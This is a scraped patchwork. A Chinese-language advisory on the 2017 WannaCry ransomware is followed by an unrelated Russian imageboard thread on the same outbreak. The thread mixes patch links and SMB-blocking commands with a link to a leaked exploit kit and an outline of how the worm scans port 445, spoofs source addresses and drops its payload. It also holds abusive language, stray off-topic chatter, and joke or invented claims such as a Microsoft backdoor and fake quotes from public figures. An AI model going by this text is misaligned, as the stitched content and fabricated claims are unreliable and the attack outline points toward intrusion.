http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8.1-kb4019215-x86_fe1cafb988ae5db6046d6e389345faf7bac587d7.msu
Windows XP、WindowsServer 2003微軟官方緊急發佈此事件的特殊更新
https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
【WannaCrypt0r 2.0 (WannaCry) 感染背景】
勒索軟體是近幾年常見的一種電腦病毒,當您的電腦被感染後,所有檔案都會被加密鎖住成無法打開的檔案類型,主要是勒索贖金,通常金額為數百美元不等,只要支付就可解鎖(但也可能無法解鎖)。而這次爆發的WannaCry就是利用前陣子Shadow Brokers揭露了秘密網路攻擊組織 Equation Group 所使用可以攻擊入侵Windows XP 至 Windows 8 及其各自對應的版本等多個EternalBlue、EmeraldThread漏洞;通過445埠在內網進行蠕蟲式感染傳播的Windows SMB 遠端執行程式碼弱點進行攻擊,如果沒有安裝安全軟體或及時更新系統安全性更新的其他內網用戶就極有可能被動感染。
如圖3及圖4所示,Microsoft已在2017年3月發佈了MS17-010-重大的SMB伺服器安全性更新(40113389),修復相關安全性漏洞;但根據目前網上所曝光的災情,估計仍有不少機構及個人用戶未定期安裝 Windows 系統更新的習慣;因此,包括俄羅斯、台灣、英國、西班牙、土耳其、越南、菲律賓、日本、義大利、葡萄牙和烏克蘭共 11 國在內都已傳出嚴重災情;其中,英國國家衛生事務局 (NHS) 旗下多間醫院及西班牙電訊公司 Telefonica 等,甚至因此無法正常運作。中國境內多個大學也已爆發感染傳播事件,甚至包括機場航班資訊、加油站等終端系統遭受影響。
圖3. Microsoft資訊安全公告 MS17-010-重大
https://technet.microsoft.com/zh-tw/library/security/ms17-010.aspx
http://www.catalog.update.microsoft.com/search.aspx?q=4012215
圖 4. Microsoft Update Catalog
【此次利用漏洞影響以下版本的作業系統】
Windows XP/Windows 2000/Windows 2003 (微軟已不再提供安全升級,請關閉445埠)
Windows Vista/Windows Server 2008/WindowsServer 2008 R2
Windows 7/Windows 8/Windows 10
Windows Server 2012/Windows Server 2012 R2/Windows Server 2016
【防禦措施建議】
由於微軟早已停止 Windows舊版本等技術支援,而該勒索軟體主要透過445埠來傳播,因此,除了安裝安全軟體及定時安裝更新與定時備份外,提供幾個方法,供用戶檢查保護自己的電腦。
如圖5與圖6所示,首先請至電腦管理 (開始->執行->compmgmt.msc->服務)停用的TCP/IP NetBIOS Helper以及Server等服務,並且啟動如圖7所示之Windows Update (Windows 7以上的用戶務必「隨時保持最新安全的更新」);此外,更要切記收到E-Mail,千萬不要隨意點擊E-mail裡的連結,這樣才能保護您的珍貴的資料與回憶,讓您的電腦遠離勒索軟體的威脅。
圖 5. 停用電腦管理的TCP/IP NetBIOS Helper
圖6. 停用電腦管理裡的Server
圖7. 啟用電腦管理裡的Windows Update
репортнул дауна
Нахуй ты это высрал, урод?
Кому нибудь еще приходило это предупреждение?
Всмысле dd ключи if=sda1 of=sda2 ну или acronis на крайняк
Наци анальную пускай с нуля программируют, на собсвенном языке, с кирилическими командами , под собственные архитектуру производимую в параше и конкурентоспособную во всем мире. Только все соснули хуй, потому что кроме как зверь двд ставить на протухлое железо с инвертарным номером нацарапаным гвоздик, вся блядская путмнкая айти нихуя не может, удивительно что вообще все не сгорело у хуям.
Тебя уже обоссали , съеби смермрблядь с гуи для крика "мама мама я хтухтер!"
1С?
Тест
Или слитый айпишникСпасибо, Абу
Абу благословил этот пост.
Или слитый айпишникСпасибо, Абу
Абу благословил этот пост.
>Наци анальную пускай с нуля программируют, на собсвенном языке, с кирилическими командами
>Конкурентноспособную во всём мире
Цопе только не пости, а то я охуею.
Всё, тебе пиздец, отправляю к тебе эксплоит за щеку в 445
А с драйверами как быть?
Короч мне кажется все равно не то
Бля, сто лет на крестах не писал!
Вот короче. А препод и правда всем преподам препод, только он только год проработал.
С помощью указателей так получается что-ли?
Я на плюсах не писал просто, только на С.
Как там вирос, посоны? Тред впадлу читать.
Прекратил распространение.
Совсем штоли? Никаких новых волн?
Сижу с ХР. Анон, мне можно не волноваться?
Совсем. Хочешь подробностей, иди на гиктаймс, там расписано что да как.
Нельзя. XP тоже уязвима.
Чем?
Что "чем"?
Где уязвимость ХР перед данным вирусом? Никаких всплыших окон не вижу, брат жив, полет нормальный
Где где, в пизде, в smb протоколе. Там даже на нее патч выкатили в микрософте, в качестве исключения, хоть поддержка ее уже давно закончена.
А что же виртуальный майор? Закрывает глаза на это беззаконие?
Пиздатый вирус.Мой антивирус оценил!
вводишь команду в ПауерШелл, применяешь - в реестре появляется SMB1.
ТРЕД № 29
Копипаста для переката: https://pastebin.com/CNErRvJA
Прошлый тред: https://2ch.hk/b/res/153037887.html
-------------------------------
ПРЕДИСЛОВИЕ:
_____
Началось массовое заражение криптовирусом по всему миру. На данный момент известно о больницах в Лондоне, ГИБДД и МВД России, Мегафоне. Запасаемся попкорном и ждем развития событий.
https://nation-news.ru/264825-virus-zakralsya-v-informacionnuyu-sistemu-gibdd-istochnik
https://meduza.io/news/2017/05/12/v-britanskih-bolnitsah-odnovremenno-proizoshel-tehnicheskiy-sboy-hakery-zablokirovali-kompyutery-i-trebuyut-vykup
http://m.pikabu.ru/story/kriptoshifrovalshchik_porazil_set_mvd_5044435
------------------------------------
ИСПРАВЛЕНИЯ, ЗАТЫКАЮЩИЕ ДЫРЫ В ВИНДЕ 7
http://www.catalog.update.microsoft.com/Search.aspx?q=4012215
http://www.catalog.update.microsoft.com/Search.aspx?q=4012212
-----------------------------------
Для Windows 7:
SMBv1 отрубается на семёре через PowerShell командой
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 -Force
Как найти PowerShell
Нажимаешь на "пуск", внизу есть поле поиска, набираешь PowerShell и запускаешь с правами администратора.
Запустил от имени админа но теперь вообще ноль реакции на команду?
Так и должно быть. это нормальное поведение. Говорит о том, что команда применилась.
Если после установки обновлений наступили ПИЗДАРИКИ.
Следующие ссылки. Только название обновления другое, но вы сможете пролистать вверх и посмотреть из списка обновление по времени-дате какое из них было роковое.
http://winerror.ru/windows-7/oshibka-pri-zapuske-windows-7-0xc000000d-1456
https://www.youtube.com/watch?v=kIRoq2QmUEM
Для Windows 10
Третий пик в ОП посте
Кто не хочет обновятся, просто пишет это в командную строку.
netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_TCP-135"
netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_TCP-445"
Требуемый апдейт MS17-010
https://technet.microsoft.com/ru-ru/library/security/ms17-010.aspx
ПРЯМЫЕ ССЫЛКИ НА ОБНОВЛЕНИЯ
Windows 7 x86 http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x86_6bb04d3971bb58ae4bac44219e7169812914df3f.msu
Windows 7 x64 http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x64_2decefaa02e2058dcd965702509a992d8c4e92b3.msu
Windows 8.1 x86 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/03/windows8.1-kb4012216-x86_d4facfdaf4b1791efbc3612fe299e41515569443.msu
Windows 8.1 x64 http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/03/windows8.1-kb4012216-x64_cd5e0a62e602176f0078778548796e2d47cfa15b.msu
---------------------------------
КАК БОРОТЬСЯ, ЕСЛИ УЖЕ ЗАРАЖЕН:
1. НЕ ПЕРЕЗАГРУЖАЙТЕ КОМПЬЮТЕР!
2. НЕ ЗАПУСКАЙТЕ .exe ФАЙЛЫ, СКАЧАННЫЕ В МАЕ
3. ОБНОВИТЕ АНТИВИРУС И ПОСТАВЬТЕ СКАНИРОВАНИЕ ВСЕЙ СИСТЕМЫ
4. СКОПИРУЙ СЕБЕ НА СТЕНУ
............/´¯/)...............(\¯`\
.........../...//....ЗДОХНИ..\\...\
........../...//......ВИРУС.....\\...\
...../´¯/..../´¯\.ЕБАНЫЙ../¯` \....\¯`\
.././.../..../..../.|_......._|.\....\....\...\.\
(.(....(....(..../..)..)…...(..(.\....)....)....).)
.\................\/.../......\...\/................/
..\.................. /.........\................../
--------------------------------
Про ВИРУС, распространение и история:
Появился набор эксплоитов FuzzBunch, который группа хакеров Shadow Brokers украла у Equation Group, хакеров из Агенства Нац. Безопасности США.
Microsoft потихому прикрыла дырки обновлением MS 17-010, возможно самым важным обновлением за последние десять лет.
В то время как набор эксплоитов уже неделю лежит в открытом доступе https://github.com/fuzzbunch/fuzzbunch с обучающими видео.
В этом наборе есть опасный инструмент DoublePulsar.
Если кратко, то если открыт 445 порт и не установлено обновление MS 17-010, то DoublePulsar
простукивает этот порт, делает перехваты системных вызовов и в память внедряет вредоносный код.
https://geektimes.ru/post/289115/
----
Еще про распространение:
ХАКЕР WHITEHAT ИТТ! РАССКАЗЫВАЮ КАК ЭТО РАБОТАЕТ. ВСЕМ ВНИМАТЕЛЬНО СЛУШАТЬ.
У тех кто начал эту атаку есть
>Эксплойты слитые Shadow brokers
>Сканнер сети который они сами написали на C/Python
>Linux сервер
Как это работает?
>Скрипт сканнера запускается на Linux сервере
>Вбивается определенный IP диапазон или целая страна
>Скрипт сканирует диапазон на открытый 445 порт
>В случае удачного обнаружения SMB сервиса, посылает эксплойт, вызывающий переполнение буфера
>эксплойт закачивает файл и запускает его.
КАК ХАКЕРЫ ДЕЛАЮТ ТАК, ЧТОБ СЕРВЕР СКАНЕРА НЕ ПАЛИЛСЯ?
В Сетевом стэке Linux допущено изменять IP Header-ы исходящих пакетов. При сканировании их программа заменяет адрес на рандомный, поэтому настоящий адрес сканера никогда не фиксируется.
--------------------------------
НЕ ПОДТВЕРЖДЕННЫЕ ДАННЫЕ:
Майкрософт в обновлении подсунула БЭКДОР и теперь за вами будут следить (информация проверяется в надежных источниках)
Виновата в виросной атаке - Монголия, Канада и ряд стран Африки (Заключение полузависимого диванного эксперта из Текстильщиков)
Уязвимы только компьютеры под управлением ОС Windows 7-10, пользователи МАКоси и Линукс могут спать спокойно (эксперты из треда оспаривают это заключение)
---------------------------------
СОТРУДНИКИ ПОЛИЦИИ БУГУРТЯТ ИЗ-ЗА ВИРУСА В ВК:
https://vk.com/wall-28464698_720473
---------------------------------
Позиция Анатолия ШАРИЯ по этому вопросу:
Тут дело скорее не в каких то хакеров из-за океана, а просто Украина решила таким образом отомстить России за Донбасс. Хотя сколько можно им говорить, что Россияне принимает участия в конфликте на востоке Украины и то, что жители путем референдума сделали свой выбор отсоединения от незалэжной. Суть вируса в том, что бы просто навести панику, которой не поддается общество. Ведущие it специалисты России прямо сейчас решают эту проблему и очень успешно.
----------------------------------
ПОЗИЦИИ РУССКИХ РЭППЕРОВ по данному вопросу.
Витя СД - сидит итт и активно поддерживает пострадавших от вируса.
Павел Техник - пожелал лично расправиться с хакерами физически.
Галат - предложил ОБОССАТЬ ХАКЕРОВ, а не сидеть на жопе.
Хованский - предлагает больно и унизительно ПОКАРАТЬ ИХ СВОЕЙ ЕЛДОЙ.
Саша Скул - предложил наказать ОХУЕВШИХ ПРОГРАММИСТОВ.
СЛАВА КПСС ХРАНИТ МОЛЧАНИЕ.
Шокк - высрал два невнятных твита.
ОКСИМУРОН - В панике, плачет в вк, т.к. зашифрованы все треки
НОЙЗ МС - Надеется что двач остановит этот хаос
ЛАРИН - Нервно покуривает, т.к. зашифровалось 400 гб с ЦП